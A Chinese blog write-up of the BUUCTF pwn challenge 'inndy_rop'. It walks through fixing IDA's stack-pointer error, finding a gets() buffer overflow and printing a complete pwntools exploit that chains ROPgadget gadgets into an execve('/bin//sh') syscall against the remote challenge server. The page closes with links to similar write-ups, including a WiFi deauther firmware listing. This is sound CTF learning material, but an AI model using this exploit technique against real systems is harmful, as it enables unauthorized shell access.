buuctf-pwn-inndy_rop-wp

最新推荐文章于 2023-05-16 09:25:49 发布
最新推荐文章于 2023-05-16 09:25:49 发布
阅读量333 收藏
点赞数
文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xuaohu123/article/details/122381403
版权

buuctf-pwn-inndy_rop

查看文件保护

在这里插入图片描述32位程序,开启了nx保护。

拖入ida,直接f5会报错

遇到这种情况,点击ida左上角options->general后出现如下图界面后,勾选stack pointer。
在这里插入图片描述然后选中报错地址的上一行,右击,然后点击change stack pointer,出现如下图界面,然后在sp那里的值前面加一个”-“就可以了。然后再按f5.
在这里插入图片描述进行反汇编,进入main函数,只有overflow,进入overflow函数,如下图。发现溢出。但左边列表里只有静态编译的结果,所以这题无法进行常规的泄露libc之类的。
在这里插入图片描述在这里插入图片描述
直接用ROPgadget工具,可以直接利用该程序的gadget拼凑连接成rop链。

ROPgadget --binary inndy_rop --ropgadget

在终端输入后,如下图
在这里插入图片描述然后自己构造payload,偏移+ropchain

from pwn import*
from struct import pack
context(os=‘linux’,arch=‘i386’,log_level=‘debug’)
r=remote(“node4.buuoj.cn”,26710)

p=b’a’*(0x0c+0x04)
p+=pack(’<I’, 0x0806ecda) # pop edx ; ret
p+=pack(’<I’, 0x080ea060) # @ .data
p+=pack(’<I’, 0x080b8016) # pop eax ; ret
p+=’/bin’
p+=pack(’<I’, 0x0805466b) # mov dword ptr [edx], eax ; ret
p+=pack(’<I’, 0x0806ecda) # pop edx ; ret
p+=pack(’<I’, 0x080ea064) # @ .data + 4
p+=pack(’<I’, 0x080b8016) # pop eax ; ret
p+=’//sh’
p+=pack(’<I’, 0x0805466b) # mov dword ptr [edx], eax ; ret
p+=pack(’<I’, 0x0806ecda) # pop edx ; ret
p+=pack(’<I’, 0x080ea068) # @ .data + 8
p+=pack(’<I’, 0x080492d3) # xor eax, eax ; ret
p+=pack(’<I’, 0x0805466b) # mov dword ptr [edx], eax ; ret
p+=pack(’<I’, 0x080481c9) # pop ebx ; ret
p+=pack(’<I’, 0x080ea060) # @ .data
p+=pack(’<I’, 0x080de769) # pop ecx ; ret
p+=pack(’<I’, 0x080ea068) # @ .data + 8
p+=pack(’<I’, 0x0806ecda) # pop edx ; ret
p+=pack(’<I’, 0x080ea068) # @ .data + 8
p+=pack(’<I’, 0x080492d3) # xor eax, eax ; ret
p+=pack(’<I’, 0x0807a66f) # inc eax ; ret
p+=pack(’<I’, 0x0807a66f) # inc eax ; ret
p+=pack(’<I’, 0x0807a66f) # inc eax ; ret
p+=pack(’<I’, 0x0807a66f) # inc eax ; ret
p+=pack(’<I’, 0x0807a66f) # inc eax ; ret
p+=pack(’<I’, 0x0807a66f) # inc eax ; ret
p+=pack(’<I’, 0x0807a66f) # inc eax ; ret
p+=pack(’<I’, 0x0807a66f) # inc eax ; ret
p+=pack(’<I’, 0x0807a66f) # inc eax ; ret
p+=pack(’<I’, 0x0807a66f) # inc eax ; ret
p+=pack(’<I’, 0x0807a66f) # inc eax ; ret
p+=pack(’<I’, 0x0806c943) # int 0x80

r.sendline§
r.interactive()

得到flag

在这里插入图片描述

the0hu
关注
BUUCTF:[Black Watch 入群题]PWN(write up)
qq_44768749的博客
08-23 930
BUUCTF:[Black Watch 入群题]PWN0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp0x06 栈迁移补充32位程序 0x01 文件分析 开启了栈不可执行 0x02 运行 运行一下没什么特殊的,猜测应该是栈溢出 0x03 IDA 虽然buf在栈上但输入的长度仅仅能够覆盖ebp和返回地址,但s在bss段,而且输入的长度也够长,因此想到了栈迁移,覆盖vul_function返回地址,使其到bss段上执行 0x04 思路 s在bss段上的地址为0
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 984
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
[BUUCTF]PWN——inndy_rop
mcmuyanga的博客
11-26 1345
inndy_rop 附件 步骤: 例行检查,32位,开启了nx保护 本地调试运行没看出个啥,直接上ida,一开始f5会报错, 找到报错提示的位置,点击option–>general调出如图的界面,勾选上stack pointar 看到堆栈不平衡,选中报错地址的上一行,右击,点击“change stack"跳出如图界面,在sp值前加个”–“即可 然后就能f5反编译了,main里就一个overflow函数,存在溢出漏洞 右边的函数列表里只有静态编译的结果,所以这题没法去泄露libc什么的 这
[BUUCTF-pwn]——inndy_rop
Y_peak的博客
03-18 364
[BUUCTF-pwn]——inndy_rop main函数无法反汇编,不过还好,里面的overflow就是gets函数,可以栈溢出。 因为懒得自己去构造rop链了,看看里面是否可以拼凑出系统的调用 里面有就省的我们自己写了 中间还找了半天错,我真是个笨蛋,以前一直用p 忘记和和构造系统调用的变量重复了,改为a就好了 exploit from pwn import * from struct import pack a = remote('node3.buuoj.cn',27139) # Padding
BUUCTF pwn——inndy_rop
CNS-Enterprise BCC-1701-J
05-16 239
BUUCTF 做题练习
[BUUCTF]inndy_rop 杂谈、32位与64位系统调用、与思考
Tokameine的博客
09-07 557
总之先从题目开始看吧,是一道非常简单但却让我长见识的题...... int overflow() { char v1[12]; // [esp+Ch] [ebp-Ch] BYREF return gets(v1); } 明显的栈溢出,且程序基本没有特别的保护,正常构造rop链即可拿到shell 主要是想拓展一下系统调用与一个简单的获取ROP方法 ROPgadget --binary rop --ropchain ROP chain...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
BUUCTF - PWN】ciscn_2019_c_1
古月浪子的博客
03-20 4080
checksec一下 IDA打开看看,encrypt函数内存在栈溢出漏洞 由于程序会将输入的内容加密,这会破坏我们的payload,所以注意到strlen函数,通过在payload开头放上 \0 来绕过加密 由于程序内没有后门函数,也没有system函数,所以考虑ret2libc 特别注意到题目是部署在Ubuntu18上的,因此调用system需要栈对齐,这里填充ret来对齐 from pwn...
inndy_rop
m0sway的博客
11-30 615
inndy_rop 使用checksec查看: 开启了栈不可执行,看题目,rop。 拉进IDA中看吧: 堆栈不平衡,不能看伪代码,不过没事,代码简单。 调用了一个overflow函数。跟进去查看: 一个gets()函数,溢出简单明了。 这题是一道静态编译的题目,所以不存在libc的调用了。 可以使用ROPgadget --binary inndy_rop --ropchain找到可以一键getshell的rop片段组合。 再加上偏移,即可。 exp: from pwn import * #start
buuctf pwninndy_rop)(cmcc_simplerop)([ZJCTF 2019]Login)
cainiao78777的博客
04-18 270
由于buuctf好多pwn题目都是一个类型的,所以就把不同的,学到东西的题目,记录一下。
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 433
buuctf-pwn 001-016题wp
buuctf-pwn write-ups (4)
CoLin的pwn小屋
06-12 519
buuctf 032-038题题解,重点关注038题 pwnable_orw
buuctf-pwn write-ups (2)
CoLin的pwn小屋
05-07 284
buuctf-pwn 017-026题wp,重点关注babyheap
BUUCTF-PWN-Writeup-1-5
feng的博客
01-20 3225
前言 开始刷一刷BuuctfPWN题,一遍学一遍刷题了。 其实主要是堆学的顶不住了。。。一个下午才搞懂一个知识点,太tm的难了。 test_your_nc from pwn import * from LibcSearcher import * context(log_level="debug",os="linux") p = remote('node4.buuoj.cn',27517) p.interactive() rip 坑。。。。 一个gets的栈溢出,后门函数fun()在0x401186,本
buuctf-pwn write-ups (3)
CoLin的pwn小屋
05-15 278
buuctf pwn 027-031题
buuctf [HarekazeCTF2019]baby_rop2
最新发布
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值